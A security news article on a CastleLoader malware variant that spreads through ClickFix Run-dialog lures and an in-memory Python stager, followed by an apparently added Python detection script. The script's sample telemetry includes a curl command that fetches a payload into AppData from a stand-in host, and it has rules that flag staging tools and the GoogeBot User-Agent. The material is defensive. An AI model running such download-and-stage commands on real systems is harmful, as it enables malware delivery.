CastleLoader Malware Now Uses Python Loader to Bypass Security
Cybersecurity researchers at Blackpoint Cyber discovered a new, evasive CastleLoader malware variant using Python and ClickFix social engineering to deliver RATs and info-stealers directly from memory.
A critical shift in cyberattack methods has been found by Blackpoint Cyber’s Adversary Pursuit Group. Their research, shared with Hackread.com, shows that CastleLoader, a malware first reported and analyzed around July and August of 2025, is getting a new, stealthier upgrade. This includes attackers now using the Python programming language to make their delivery system harder to spot.
**The Deceptive Delivery Method**
CastleLoader has traditionally been delivered using a sneaky social engineering attack called ClickFix, where attackers trick people into typing a command into the Windows Run box (by pressing the Win + R keys), typically disguised as a human verification step or a fix for a fake error.
This single command then secretly activates built-in Windows tools like curl.exe and tar to manage the initial file transfer and staging process, storing the contents in a hidden folder on the user’s computer, all without displaying any visible window or prompt.
Blackpoint’s investigation reveals that in this campaign CastleLoader’s role is simple but dangerous. It downloads an encrypted, hidden package from the attacker’s server, then runs whatever malicious program the attacker chooses on the victim’s computer.
Researchers observed that it has been used to install a broad range of malware, including remote control tools like CastleRAT or NetSupport RAT, and information-stealing programs such as Stealc, RedLine, Rhadamanthys, and MonsterV2.
**The Stealthy Python Stager**
Further probing revealed that once the files are staged, a small Python script is run using the windowless interpreter (pythonw.exe). This script runs secretly without any console window to rebuild and launch CastleLoader directly within memory, avoiding the need to write an executable file to the disk. Researchers noted that attackers used “Python bytecode, in-memory shellcode execution, and PEB Walking to bypass traditional defences.”
CastleLoader Kill Chain (Source: Blackpoint)
The PEB Walking method is a key part of the attack, allowing the malware to look for necessary system functions and resolve required APIs entirely at runtime, which helps it avoid security tools. When CastleLoader finally connects to the attacker’s server to download its final payload, it uses a unique identifying tag, a hardcoded GoogeBot User-Agent. This unusual tag is a specific clue that confirms this is a continuing attack from the CastleLoader family.
This detailed investigation points to a clear evolution in the tools used by criminals. Blackpoint security experts propose that users must be taught to avoid ClickFix social engineering, particularly any prompt asking them to use the Windows Run dialog box.
Administrators should limit or disable access to the Run dialog, cmd.exe, PowerShell, and Python programs for most users, and monitor for suspicious activity, such as Python running from unusual locations like the AppData folder.
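The monitoring advice above, turned into a small triage rule set as an added example (not code from Blackpoint or the article): it flags curl.exe/tar.exe launched from the Run dialog, a Python interpreter running from a user-writable folder such as AppData, and the hardcoded GoogeBot User-Agent. The telemetry records are constructed, and the assumption that a Run-dialog command is spawned by explorer.exe is noted in the code.

```python
import re
from typing import Iterable

# Constructed sample telemetry (not captured from a real incident): simplified
# process-creation and web-proxy records in the shape an EDR or SIEM exports.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -o %LOCALAPPDATA%\\cache\\stage.tar https://example.invalid/stage"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\tar.exe",
     "cmd": "tar -xf stage.tar"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\alice\AppData\Local\cache\py\pythonw.exe",
     "cmd": "pythonw.exe stage.pyc"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Python312\pythonw.exe",
     "cmd": "pythonw.exe idle.py"},  # benign: interpreter in its install location
    {"type": "http", "process": r"C:\Users\alice\AppData\Local\cache\py\pythonw.exe",
     "user_agent": "GoogeBot", "url": "https://c2.example.invalid/payload"},
    {"type": "http", "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "user_agent": "Mozilla/5.0", "url": "https://example.com/"},
]

# User-writable locations from which a Python interpreter should not normally run.
SUSPICIOUS_DIRS = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)
STAGING_TOOLS = {"curl.exe", "tar.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[dict]) -> list[str]:
    """Return one finding per event that matches a CastleLoader-style indicator."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            image = basename(ev["image"])
            # Assumption: a command typed into the Run dialog is spawned by explorer.exe.
            if image in STAGING_TOOLS and basename(ev["parent"]) == "explorer.exe":
                findings.append(f"staging tool from Run dialog: {ev['cmd']}")
            if image in PYTHON_IMAGES and SUSPICIOUS_DIRS.search(ev["image"]):
                findings.append(f"python from user-writable path: {ev['image']}")
        elif ev["type"] == "http" and ev["user_agent"].lower().startswith("googebot"):
            findings.append(f"hardcoded GoogeBot UA from {basename(ev['process'])}: {ev['url']}")
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

In a real deployment the parent-process and path rules need tuning against the organisation's own software inventory; the User-Agent match is the most specific of the three.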